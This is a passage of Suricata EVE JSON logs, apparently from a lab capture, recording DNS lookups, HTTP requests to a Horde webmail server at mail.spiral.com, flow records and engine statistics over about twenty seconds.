0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1731,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2206,"failed_udp":108},"tx":{"http":4498,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2283}},"flow_mgr":{"closed_pruned":2667,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":22938,"memcap":0}}} {"timestamp":"2020-02-29T00:03:59.357530+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42601,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61359,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:59.469367+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42601,"proto":"UDP","dns":{"type":"answer","id":61359,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:59.469367+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42601,"proto":"UDP","dns":{"type":"answer","id":61359,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:59.641684+0000","flow_id":223959634101441,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6896}} {"timestamp":"2020-02-29T00:04:00.084792+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62022,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:00.190190+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47014,"proto":"UDP","dns":{"type":"answer","id":62022,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:00.190190+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47014,"proto":"UDP","dns":{"type":"answer","id":62022,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:00.211063+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:04:00.211063+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":11,"tx_id":0}} {"timestamp":"2020-02-29T00:04:02.000622+0000","flow_id":946128316031874,"event_type":"flow","src_ip":"192.168.10.130","src_port":34714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1037,"bytes_toclient":4130,"start":"2020-02-29T00:02:56.680834+0000","end":"2020-02-29T00:03:01.884783+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:03.000848+0000","flow_id":835593022375949,"event_type":"flow","src_ip":"192.168.10.122","src_port":51967,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:02.231437+0000","end":"2020-02-28T23:59:02.339962+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:04.646765+0000","flow_id":223959634101441,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6896},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35873,"tx_id":0}} {"timestamp":"2020-02-29T00:04:05.000201+0000","event_type":"stats","stats":{"uptime":13897,"capture":{"kernel_packets":133045,"kernel_drops":0},"decoder":{"pkts":133051,"bytes":92203990,"invalid":180,"ipv4":131614,"ipv6":8,"ethernet":133051,"raw":0,"null":0,"sll":0,"tcp":126576,"udp":4844,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2689,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2705,"synack":2696,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1733,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2208,"failed_udp":108},"tx":{"http":4500,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2285}},"flow_mgr":{"closed_pruned":2668,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":108597,"memcap":0}}} {"timestamp":"2020-02-29T00:04:05.216190+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52680,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:04:06.676109+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49816,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32616,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:06.787475+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49816,"proto":"UDP","dns":{"type":"answer","id":32616,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:06.787475+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49816,"proto":"UDP","dns":{"type":"answer","id":32616,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:06.871373+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3286}} {"timestamp":"2020-02-29T00:04:09.268672+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49249,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:09.374158+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45696,"proto":"UDP","dns":{"type":"answer","id":49249,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:09.374158+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45696,"proto":"UDP","dns":{"type":"answer","id":49249,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:09.585969+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6128}} {"timestamp":"2020-02-29T00:04:10.571181+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3286},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16441,"tx_id":0}} {"timestamp":"2020-02-29T00:04:10.577609+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53940,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42246,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:10.689883+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53940,"proto":"UDP","dns":{"type":"answer","id":42246,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:10.689883+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53940,"proto":"UDP","dns":{"type":"answer","id":42246,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:10.775587+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4207}} {"timestamp":"2020-02-29T00:04:12.000165+0000","event_type":"stats","stats":{"uptime":13904,"capture":{"kernel_packets":133091,"kernel_drops":0},"decoder":{"pkts":133102,"bytes":92224080,"invalid":180,"ipv4":131665,"ipv6":8,"ethernet":133102,"raw":0,"null":0,"sll":0,"tcp":126621,"udp":4850,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2691,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2707,"synack":2698,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1735,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2211,"failed_udp":108},"tx":{"http":4503,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2288}},"flow_mgr":{"closed_pruned":2668,"new_pruned":15,"est_pruned":2253,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22153,"memcap_state":0,"memcap_global":0},"http":{"memuse":104611,"memcap":0}}} {"timestamp":"2020-02-29T00:04:13.000689+0000","flow_id":1392564397028430,"event_type":"flow","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":14,"bytes_toserver":1764,"bytes_toclient":10505,"start":"2020-02-29T00:03:02.078926+0000","end":"2020-02-29T00:03:12.487416+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:13.085632+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6128},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30698,"tx_id":0}} {"timestamp":"2020-02-29T00:04:13.095623+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34876,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32846,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:13.201001+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34876,"proto":"UDP","dns":{"type":"answer","id":32846,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:13.201001+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34876,"proto":"UDP","dns":{"type":"answer","id":32846,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:13.260012+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3983}} {"timestamp":"2020-02-29T00:04:13.850697+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4207},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18539,"tx_id":1}} {"timestamp":"2020-02-29T00:04:13.858938+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56174,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43521,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:13.964382+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56174,"proto":"UDP","dns":{"type":"answer","id":43521,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:13.964382+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56174,"proto":"UDP","dns":{"type":"answer","id":43521,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:14.000532+0000","flow_id":518199234830083,"event_type":"flow","src_ip":"192.168.10.122","src_port":55695,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:12.958211+0000","end":"2020-02-28T23:59:13.067202+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:14.059453+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":227,"tx_id":2}} {"timestamp":"2020-02-29T00:04:14.071587+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4240}} {"timestamp":"2020-02-29T00:04:15.000366+0000","flow_id":1169518155910251,"event_type":"flow","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1821,"bytes_toclient":2206,"start":"2020-02-29T00:03:09.248939+0000","end":"2020-02-29T00:03:14.259385+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:15.000612+0000","flow_id":1452797018606239,"event_type":"flow","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":32,"pkts_toclient":35,"bytes_toserver":8103,"bytes_toclient":30851,"start":"2020-02-29T00:03:05.494239+0000","end":"2020-02-29T00:03:14.340795+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:17.804624+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3983},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":1}} {"timestamp":"2020-02-29T00:04:17.809849+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48057,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62573,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:17.921212+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48057,"proto":"UDP","dns":{"type":"answer","id":62573,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:17.921212+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48057,"proto":"UDP","dns":{"type":"answer","id":62573,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:17.989839+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5156}} {"timestamp":"2020-02-29T00:04:19.000229+0000","event_type":"stats","stats":{"uptime":13911,"capture":{"kernel_packets":133116,"kernel_drops":0},"decoder":{"pkts":133128,"bytes":92236380,"invalid":180,"ipv4":131691,"ipv6":8,"ethernet":133128,"raw":0,"null":0,"sll":0,"tcp":126643,"udp":4854,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2691,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2707,"synack":2698,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1735,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2213,"failed_udp":108},"tx":{"http":4505,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2290}},"flow_mgr":{"closed_pruned":2671,"new_pruned":15,"est_pruned":2254,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22815,"memcap_state"